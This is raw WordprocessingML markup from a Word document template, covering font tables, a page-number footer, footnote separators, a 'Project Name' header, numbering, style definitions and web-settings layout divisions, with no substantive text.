    <w:p w14:paraId="75B086B0" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6F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ABDF6B0-8F87-4BA0-84EA-0A33C562308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D45D7AA-6B7C-43B3-B876-E5F7202DF968}"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
    <w:embedRegular r:id="rId3" w:fontKey="{4856B5E0-4027-468E-97BC-B0CB10773862}"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId4" w:fontKey="{32914F9F-7C04-4E0A-A530-17750769A744}"/>
    <w:embedBold r:id="rId5" w:fontKey="{3AE15AE6-E6CF-43DD-B1BA-A03614AF118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143B2A71-97AE-4AC3-AC1B-06DC6E2B56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1A3F0BB6" w:rsidR="003B094A" w:rsidRDefault="00963AEF">
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="000D53FB">
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="432FAC26" w14:textId="77777777" w:rsidR="00701DB9" w:rsidRDefault="00701D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03016" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6FAB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6471A51D" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6FAB"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="61A8D3CE" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6FAB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D27A34" w14:textId="77777777" w:rsidR="009C6FAB" w:rsidRDefault="009C6F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C5C04" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF">
    <w:r>
      <w:t xml:space="preserve">                                                               </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2093CA67" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="444B17D2" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia" w:cs="Georgia"/>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:t xml:space="preserve">                                                                                                                                 Project Name </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="0966BDD0" w14:textId="77777777" w:rsidR="00701DB9" w:rsidRDefault="00701D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51943"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="888C0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54102"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40649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D72D6"/>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E262594"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B6C08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4C0325"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EF6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FE1D65"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D01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25C40"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A83A3E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41E30D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA8AE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8F5873"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A990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F5407E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3A8A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C7AB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10DE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731159">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1394350011">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1990210726">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="591201549">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="899099102">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="9071661">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="382682678">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1584096981">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1491367980">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="522978122">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1385787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4A"/>
    <w:rsid w:val="00021945"/>
    <w:rsid w:val="00054F23"/>
    <w:rsid w:val="00056B3C"/>
    <w:rsid w:val="000D53FB"/>
    <w:rsid w:val="000E3FE9"/>
    <w:rsid w:val="0014204E"/>
    <w:rsid w:val="001539B8"/>
    <w:rsid w:val="001A4CBA"/>
    <w:rsid w:val="001D24F4"/>
    <w:rsid w:val="001E672B"/>
    <w:rsid w:val="001F4912"/>
    <w:rsid w:val="001F60F0"/>
    <w:rsid w:val="0021082F"/>
    <w:rsid w:val="00221F08"/>
    <w:rsid w:val="0023502A"/>
    <w:rsid w:val="002617FF"/>
    <w:rsid w:val="00283874"/>
    <w:rsid w:val="002964F9"/>
    <w:rsid w:val="002C1F05"/>
    <w:rsid w:val="002D44D8"/>
    <w:rsid w:val="002E5671"/>
    <w:rsid w:val="002F1ECC"/>
    <w:rsid w:val="00302308"/>
    <w:rsid w:val="0033412E"/>
    <w:rsid w:val="0033546C"/>
    <w:rsid w:val="00346024"/>
    <w:rsid w:val="003537EE"/>
    <w:rsid w:val="0035767D"/>
    <w:rsid w:val="00365457"/>
    <w:rsid w:val="0038008B"/>
    <w:rsid w:val="00394493"/>
    <w:rsid w:val="003B094A"/>
    <w:rsid w:val="003F66C0"/>
    <w:rsid w:val="0045586F"/>
    <w:rsid w:val="004C37C9"/>
    <w:rsid w:val="004D095A"/>
    <w:rsid w:val="004F574F"/>
    <w:rsid w:val="00500698"/>
    <w:rsid w:val="00503F81"/>
    <w:rsid w:val="00512EEF"/>
    <w:rsid w:val="00534AE3"/>
    <w:rsid w:val="00576C38"/>
    <w:rsid w:val="00592A69"/>
    <w:rsid w:val="005C6642"/>
    <w:rsid w:val="005E7840"/>
    <w:rsid w:val="00644B62"/>
    <w:rsid w:val="0064517F"/>
    <w:rsid w:val="0065204B"/>
    <w:rsid w:val="006D5846"/>
    <w:rsid w:val="006E1114"/>
    <w:rsid w:val="006E4AB5"/>
    <w:rsid w:val="006F7D84"/>
    <w:rsid w:val="00701DB9"/>
    <w:rsid w:val="007109A0"/>
    <w:rsid w:val="007140EF"/>
    <w:rsid w:val="007435F4"/>
    <w:rsid w:val="007512EF"/>
    <w:rsid w:val="007661C3"/>
    <w:rsid w:val="00772B3F"/>
    <w:rsid w:val="007747D8"/>
    <w:rsid w:val="007A6B22"/>
    <w:rsid w:val="007C0022"/>
    <w:rsid w:val="007C39F1"/>
    <w:rsid w:val="007D2747"/>
    <w:rsid w:val="007F3424"/>
    <w:rsid w:val="0080537F"/>
    <w:rsid w:val="00821B39"/>
    <w:rsid w:val="008A5CDA"/>
    <w:rsid w:val="008B54BE"/>
    <w:rsid w:val="008D1701"/>
    <w:rsid w:val="00900B6C"/>
    <w:rsid w:val="00914449"/>
    <w:rsid w:val="00920B1C"/>
    <w:rsid w:val="00920D8C"/>
    <w:rsid w:val="00954121"/>
    <w:rsid w:val="00963AEF"/>
    <w:rsid w:val="00973BAF"/>
    <w:rsid w:val="00976773"/>
    <w:rsid w:val="009A288A"/>
    <w:rsid w:val="009C6FAB"/>
    <w:rsid w:val="00A076F7"/>
    <w:rsid w:val="00A17040"/>
    <w:rsid w:val="00A65D41"/>
    <w:rsid w:val="00A7540E"/>
    <w:rsid w:val="00AA1061"/>
    <w:rsid w:val="00AA4D1E"/>
    <w:rsid w:val="00AD25DE"/>
    <w:rsid w:val="00AD2979"/>
    <w:rsid w:val="00AE1C8F"/>
    <w:rsid w:val="00AF5A1E"/>
    <w:rsid w:val="00B14047"/>
    <w:rsid w:val="00B142BC"/>
    <w:rsid w:val="00B160F3"/>
    <w:rsid w:val="00B50534"/>
    <w:rsid w:val="00B7472F"/>
    <w:rsid w:val="00B76FCB"/>
    <w:rsid w:val="00BB6A69"/>
    <w:rsid w:val="00BC24AD"/>
    <w:rsid w:val="00BF7B67"/>
    <w:rsid w:val="00C62B18"/>
    <w:rsid w:val="00C64D50"/>
    <w:rsid w:val="00C771D9"/>
    <w:rsid w:val="00C858C4"/>
    <w:rsid w:val="00CC3560"/>
    <w:rsid w:val="00CF7028"/>
    <w:rsid w:val="00D47393"/>
    <w:rsid w:val="00D549F1"/>
    <w:rsid w:val="00D54F2F"/>
    <w:rsid w:val="00D8424B"/>
    <w:rsid w:val="00D93A91"/>
    <w:rsid w:val="00DA577F"/>
    <w:rsid w:val="00DC3E32"/>
    <w:rsid w:val="00DF65F7"/>
    <w:rsid w:val="00E27CD0"/>
    <w:rsid w:val="00E3432F"/>
    <w:rsid w:val="00E86CEA"/>
    <w:rsid w:val="00EB0EEA"/>
    <w:rsid w:val="00EF278D"/>
    <w:rsid w:val="00F168E8"/>
    <w:rsid w:val="00F26C55"/>
    <w:rsid w:val="00F37366"/>
    <w:rsid w:val="00F6279D"/>
    <w:rsid w:val="00FB653A"/>
    <w:rsid w:val="00FD3E2A"/>
    <w:rsid w:val="00FD4806"/>
    <w:rsid w:val="00FE25F0"/>
    <w:rsid w:val="00FF1943"/>
    <w:rsid w:val="00FF2144"/>
    <w:rsid w:val="2C9B8A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7F0AD"/>
  <w15:docId w15:val="{BCF4CB99-8479-4AC7-A403-A1452AC0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2EF"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="both"/>
    </w:p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link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000050"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="A9A9FE"/>
    </w:tcPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a6">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000050"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="A9A9FE"/>
    </w:tcPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004046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62C"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0040462C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0040462C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0040462C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0040462C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002367A7"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002367A7"/>
    <w:rPr>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="C2-Table-Body">
    <w:name w:val="C2-Table-Body"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="002367A7"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Tahoma"/>
      <w:color w:val="EEECE1" w:themeColor="background2"/>
      <w:spacing w:val="4"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="006636DD"/>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00CA34AC"/>
    <w:pPr>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="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A34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3584"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00043584"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E37C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E37C8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E37C8"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="a7">
    <w:basedOn w:val="TableNormal"/>
    <w:pPr>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000050"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="A9A9FE"/>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240" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000050"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblCellMar>
        <w:left w:w="115" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tcPr>
      <w:shd w:val="clear" w:color="auto" w:fill="A9A9FE"/>
    </w:tcPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00772B3F"/>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8053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6170">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1529179674">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="166989214">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="775097317">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1669479880">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="17409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830">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="230966572">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="307592732">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="530342579">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="486408341">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="864555825">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="123471400">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="16570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1642">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="513616332">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1472167566">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2051686048">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="443816635">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
